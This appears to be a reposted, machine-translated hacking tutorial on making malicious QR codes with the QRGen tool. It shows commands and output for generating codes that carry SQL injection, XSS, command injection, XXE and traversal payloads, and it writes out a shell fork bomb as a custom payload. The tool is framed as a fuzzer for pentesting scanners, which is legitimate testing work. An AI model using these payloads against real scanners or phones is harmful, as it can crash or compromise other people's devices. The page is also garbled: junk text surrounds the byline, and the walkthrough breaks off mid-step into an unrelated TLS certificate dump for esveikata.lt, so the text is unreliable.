Generate malicious QR codes to hack phones and scanners

Autorius: Dr. Leslie Schwab Šaltinis: https://www.shiftfrequency.com... 2021-11-13 23:34:00, skaitė 452, komentavo 2

Generate malicious QR codes to hack phones and scanners

Cyber Apocalypse

Klaus Schwab How To Make Computer Virus

QR codes are everywhere, from product packaging to airline boarding passes, making scanners that read them a delicious target for hackers.

infoguard cyber security qr code security

Due to defects in many of these scanners, it is possible to exploit common vulnerabilities using exploits formatted in custom QR codes. A tool called QRGen can generate malicious QR codes and even encrypt custom payloads.

These attacks are quite targeted because people can not read or understand the information contained in a QR code without scanning it, possibly exposing any device used to try to decrypt the code into the exploit contained inside.

Even QR scanners, such as smartphones, can be vulnerable to this type of attack, as QR codes have been found to lure iPhone users to malicious websites.

What are QR codes?

QR codes are readable data formats that are useful for anything that needs to be scanned automatically. Before QR codes, there were many other formats called barcodes, which also stored data in a way that was easy for machines to read.

You've probably seen a UPC barcode like the one on products, as it is often used to identify items for sale so cashiers can scan them to allow for faster payment.

The UPC Barcode, or Global Product Code, has been in use since 1974. It targets mainly retailers and encodes only a series of numbers, making it limited. While there are many different types of barcodes, they are not able to store much information.

2D Barcodes for more data

The answer to barcode limitation was 2D codes, which offer greater storage of information contained within them. Some of the first two-dimensional codes resembled the following, which is still widely used today.

aztec code

Aztec code is a 2D, similar to a QR code and can contain more information than a barcode. Originally developed for logistics, you can see it being used in packages and folders when more data needs to be stored than a barcode can provide.

Other types of 2D codes may contain extremely large amounts of data. The PDF417 format on the back of most licenses in the United States, for example, can encode up to 1800 ASCII characters.

σφσδ

PDF417 codes as above can encode text, numbers, files and actual data bytes and are more error resistant than barcodes. Companies such as FedEx use a combination of PDF417 and other barcodes on their packaging sheets to automate their delivery and tracking.

What can passwords with more data do?

QR codes started in the automotive industry as a way to track cars as they were manufactured, but quickly grew in popularity outside of this industry. Similar to other two-dimensional codes, QR codes can pack large amounts of data and can even work when reduced in resolution or damaged.

frame2

A single QR code can contain 4.296 ASCII characters, which allows you to be much more creative about what you can do with them. You can even format the data to take action when it is recognized by a reader.

An exciting application of QR codes enabled by their larger data capacity is their use to manage Wi-Fi connections without sharing a plain text password.

By encoding the following string, you can generate a QR code that automatically registers Android users on a Wi-Fi network.

WIFI:S:;T:;P:;H:;

Anyone who scans the QR code on an Android device will automatically be connected to the encrypted Wi-Fi network. To find out how much data a QR code can pack, take a look at this code:

2

This tiny code contains the following text:

Version 40 QR Code can contain up to 1852 chars.
A QR code (abbreviated from Quick Response code) is a type of matrix barcode (or two-dimensional code) that is designed to be read by smartphones.
The code consists of black modules arranged in a square pattern on a white background. The information encoded may be text, a URL, or other data.
Created by Toyota subsidiary Denso Wave in 1994, the QR code is one of the most popular types of two-dimensional barcodes.
The QR code was designed to allow its contents to be decoded at high speed.
The technology has seen frequent use in Japan and South Korea; the United Kingdom is the seventh-largest national consumer of QR codes.
Although initially used for tracking parts in vehicle manufacturing, QR codes now are used in a much broader context,
including both commercial tracking applications and convenience-oriented applications aimed at mobile phone users (termed mobile tagging).
QR codes may be used to display text to the user, to add a vCard contact to the user's device, to open a Uniform Resource Identifier (URI), or to compose an e-mail or text message.
Users can generate and print their own QR codes for others to scan and use by visiting one of several paid and free QR code generating sites or apps.

The text in the image is larger than the QR code itself! Capacity makes QR codes both powerful and dangerous, because people cannot understand the data in them without first scanning them.

QRgen for QR Code Hacking

Because a person cannot detect a malicious QR code before scanning it, the relatively large payload of a QR code can work to the benefit of a hacker, especially when paired with vulnerable devices. The tool we will use today to create them is called QRGen. It will take a payload and encode it into a QR code using Python.

QRGen comes with a built-in library that contains many popular exploits, which are extremely useful if you have time to sit down with the same device you want to take advantage of and find out what works for it.

For a pentester who wants to test anything using a QR code scanner, simply purchasing the scanner itself and running the exploits can lead the scanner to behave in unexpected ways.

The payload categories available on QRGen are accessible using the flag -l and a number when executing the script. The number and type of payload are listed below.

In 0: SQL Injections
In 1: XSS
In 2: Command Injection
In 3: Format String
In 4: XXE
In 5: String Fuzzing
In 6: SSI Injection
In 7: LFI / Directory Traversal

To create a bunch of malicious QR codes that include payloads with a fuzzy string, I just need to run QRGen.py -l 5 and I will have many codes to test.

What you will need

To use QRGen, you will need to install Python3. Because it is cross-platform, it should be possible to do it in any operating system. You will also need some Python libraries, including qrcode, Pillow and argparse, which we will install during installation.

Step 1: Install QRGen

To get started with QRGen, you will need to download the repository from GitHub . We will do this by executing the following command in a terminal window.

~$ git clone https://github.com/h0nus/QRGen

Cloning into 'QRGen'...
remote: Enumerating objects: 86, done.
remote: Counting objects: 100% (86/86), done.
remote: Compressing objects: 100% (78/78), done.
remote: Total 86 (delta 26), reused 4 (delta 1), pack-reused 0
Unpacking objects: 100% (86/86), done.

Once the repository download is complete, change ( cd ) his list and write ls to view its contents and find the requirements file.

~$ cd QRGen
~/QRGen$ ls

demo.gif  qrgen.py  README.md  requirements.txt  words

Now, we need to make sure we have all the required libraries installed. To do this, we will run the installation file with the following command.

~/QRGen$ pip3 install -r requirements.txt

Collecting qrcode (from -r requirements.txt (line 1))
  Downloading https://files.pythonhosted.org/packages/42/87/4a3a77e59ab7493d64da1f69bf1c2e899a4cf81e51b2baa855e8cc8115be/qrcode-6.1-py2.py3-none-any.whl
Requirement already satisfied: Pillow in /usr/lib/python3/dist-packages (from -r requirements.txt (line 2)) (5.4.1)
Collecting argparse (from -r requirements.txt (line 3))
  Downloading https://files.pythonhosted.org/packages/f2/94/3af39d34be01a24a6e65433d19e107099374224905f1e0cc6bbe1fd22a2f/argparse-1.4.0-py2.py3-none-any.whl
Requirement already satisfied: six in /usr/lib/python3/dist-packages (from qrcode->-r requirements.txt (line 1)) (1.12.0)
Installing collected packages: qrcode, argparse
Successfully installed argparse-1.4.0 qrcode-6.1

If this does not work, you can also install it with this alternative command.

~/QRGen$ python3 -m pip install -r requirements.txt

Step 2: Generate malicious QR codes from a payload type

Now, you should be able to run the script by typing python3 qrgen.py .

~/QRGen$ python3 qrgen.py

  e88 88e   888 88e    e88'Y88
 d888 888b  888 888D  d888  'Y   ,e e,  888 8e
C8888 8888D 888 88"  C8888 eeee d88 88b 888 88b
 Y888 888P  888 b,    Y888 888P 888   , 888 888
  "88 88"   888 88b,   "88 88"   "YeeP" 888 888
      b
      8b,    QRGen ~ v0.1 ~ by h0nus

usage: qrgen.py -l [number]
usage: qrgen.py -w [/path/to/custom/wordlist]

Payload lists:
0 : SQL Injections
1 : XSS
2 : Command Injection
3 : Format String
4 : XXE
5 : String Fuzzing
6 : SSI Injection
7 : LFI / Directory Traversal

Tool to generate Malformed QRCodes for fuzzing QRCode parsers/reader

optional arguments:
  -h, --help            show this help message and exit

Options for QRGen:
  --list {0,1,2,3,4,5,6,7}, -l {0,1,2,3,4,5,6,7}
                        Set wordlist to use
  --wordlist WORDLIST, -w WORDLIST
                        Use a custom wordlist

Pay attention everywhere, even in the dumbest spot

As you can see, creating payloads is very simple. To get started, let's create a payload that contains string payloads. To do this, run QRGen with the following argument.

python3 qrgen.py -l 5

  e88 88e   888 88e    e88'Y88
 d888 888b  888 888D  d888  'Y   ,e e,  888 8e
C8888 8888D 888 88"  C8888 eeee d88 88b 888 88b
 Y888 888P  888 b,    Y888 888P 888   , 888 888
  "88 88"   888 88b,   "88 88"   "YeeP" 888 888
      b
      8b,    QRGen ~ v0.1 ~ by h0nus

Payload path generated..
Path already cleared or deleted..
Generated 46 payloads!
Opening last generated payload...
Thanks for using QRGen, made by H0nus..

A series of QR codes will be generated and the last one created will open automatically.

3

To see the rest of the payloads, you can enter cd genqr to go to the directory where they are created and ls to see their content.

~/QRGen$ cd genqr
~/QRGen/genqr$ ls

payload-0.png   payload-19.png  payload-28.png  payload-37.png  payload-4.png
payload-10.png  payload-1.png   payload-29.png  payload-38.png  payload-5.png
payload-11.png  payload-20.png  payload-2.png   payload-39.png  payload-6.png
payload-12.png  payload-21.png  payload-30.png  payload-3.png   payload-7.png
payload-13.png  payload-22.png  payload-31.png  payload-40.png  payload-8.png
payload-14.png  payload-23.png  payload-32.png  payload-41.png  payload-9.png
payload-15.png  payload-24.png  payload-33.png  payload-42.png
payload-16.png  payload-25.png  payload-34.png  payload-43.png
payload-17.png  payload-26.png  payload-35.png  payload-44.png
payload-18.png  payload-27.png  payload-36.png  payload-45.png

Step 3: Encode custom payloads

To encode a custom payloads, we can first create a text file that contains what we want to encode. Each line will be a new payloads. First, we can create a text file by typing nano badstuff.txt to create a text file.

~/QRGen/genqr$ nano badstuff.txt

In this text file, we can put our payload. The following is a fork bomb. It will work in a QR code scanner.

:(){ :|: & };:

We can save it by pressing Control X and then press Y and Enter to confirm your save. Now, you should see a text file containing your payload.

~/QRGen/genqr$ ls

badstuff.txt    payload-18.png  payload-27.png  payload-36.png  payload-45.png
payload-0.png   payload-19.png  payload-28.png  payload-37.png  payload-4.png
payload-10.png  payload-1.png   payload-29.png  payload-38.png  payload-5.png
payload-11.png  payload-20.png  payload-2.png   payload-39.png  payload-6.png
payload-12.png  payload-21.png  payload-30.png  payload-3.png   payload-7.png
payload-13.png  payload-22.png  payload-31.png  payload-40.png  payload-8.png
payload-14.png  payload-23.png  payload-32.png  payload-41.png  payload-9.png
payload-15.png  payload-24.png  payload-33.png  payload-42.png
payload-16.png  payload-25.png  payload-34.png  payload-43.png
payload-17.png  payload-26.png  payload-35.png  payload-44.png

To write the payload in a QR code, we will use the flag -w . Assuming your payload file is called "badstuff.txt", the command to do this should look like this (remember to go back to the QRGen directory).

Web Client Authentication esveikata.lt
authorityKeyIdentifier keyid:8D:8C:5E:C4:54:AD:8A:E1:77:E9:9B:F9:9B:05:E1:B8:01:8D:61:E1 subjectKeyIdentifier 14:A9:D5:33:19:A2:BF:EE:AB:26:99:08:8F:27:C1:64:BE:BB:59:3F keyUsage Digital Signature, Key Encipherment basicConstraints CA:FALSE extendedKeyUsage TLS Web Server Authentication, TLS Web Client Authentication certificatePolicies Policy: 1.3.6.1.4.1.6449.1.2.2.7 CPS: https://sectigo.com/CPS Policy: 2.23.140.1.2.1 authorityInfoAccess CA Issuers - URI:http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt OCSP - URI:http://ocsp.sectigo.com subjectAltName DNS:*.esveikata.lt, DNS:esveikata.lt ct_precert_scts Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 46:A5:55:EB:75:FA:91:20:30:B5:A2:89:69:F4:F3:7D: 11:2C:41:74:BE:FD:49:B8:85:AB:F2:FC:70:FE:6D:47 Timestamp : May 21 06:39:28.687 2021 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:8D:4F:98:76:02:A7:C5:88:28:14:F4: F9:1B:7E:E1:41:A9:5D:9A:F8:8E:96:7E:A1:89:C9:16: 84:C4:87:90:3C:02:21:00:C6:D5:6A:54:65:FC:7D:A8: 23:72:7A:48:9F:5C:39:28:10:7B:67:7B:87:E6:28:E0: 7C:CF:73:E4:54:6A:B6:08 Signed Certificate Timestamp: Version : v1 (0x0) Log ID : DF:A5:5E:AB:68:82:4F:1F:6C:AD:EE:B8:5F:4E:3E:5A: EA:CD:A2:12:A4:6A:5E:8E:3B:12:C0:20:44:5C:2A:73 Timestamp : May 21 06:39:28.657 2021 GMT Extensions: none Signature : ecdsa-with-SHA256 30:45:02:21:00:E8:EF:AE:6A:EE:27:F8:A8:9D:5F:6E: 8C:B3:D5:D1:3B:2A:AD:8B:57:0E:E4:33:3B:88:BB:66: 81:F8:EC:A8:21:02:20:1F:18:F2:B5:F3:F4:DA:AD:72: 1A:3A:21:11:EB:EE:7C:E3:46:8C:A2:F8:4E:EA:52:08: 3A:82:70:67:D1:19:50 Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 29:79:BE:F0:9E:39:39:21:F0:56:73:9F:63:A5:77:E5: BE:57:7D:9C:60:0A:F8:F9:4D:5D:26:5C:25:5D:C7:84 Timestamp : May 21 06:39:28.656 2021 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:8D:0D:1C:E2:8D:04:E1:FC:80:27:DA: B5:85:82:0B:8F:CA:71:12:5E:76:BB:BF:BC:75:B0:4B: D2:87:69:AF:FC:02:21:00:E0:54:BC:BD:49:1D:0F:64: B1:C6:3D:5F:01:CE:EB:15:1E:80:2C:3F:B5:44:60:4C: A1:85:94:69:A3:75:4B:D0 ---------------------------------------------------
Web Client Authentication esveikata.lt

name /CN=*.esveikata.lt subject CN *.esveikata.lt hash d7ce4d18 issuer C GB ST Greater Manchester L Salford O Sectigo Limited CN Sectigo RSA Domain Validation Secure Server CA version 2 serialNumber 0xFE63E645CFF55E565DA53FE7BF924AB8 serialNumberHex FE63E645CFF55E565DA53FE7BF924AB8 validFrom 210521000000Z validTo 220621235959Z validFrom_time_t 1621555200 valid From: 2021, May 21, 12:00 AM validTo_time_t 1655855999 valid Until: 2022, Jun 21, 11:59 PM signatureTypeSN RSA-SHA256 signatureTypeLN sha256WithRSAEncryption signatureTypeNID 668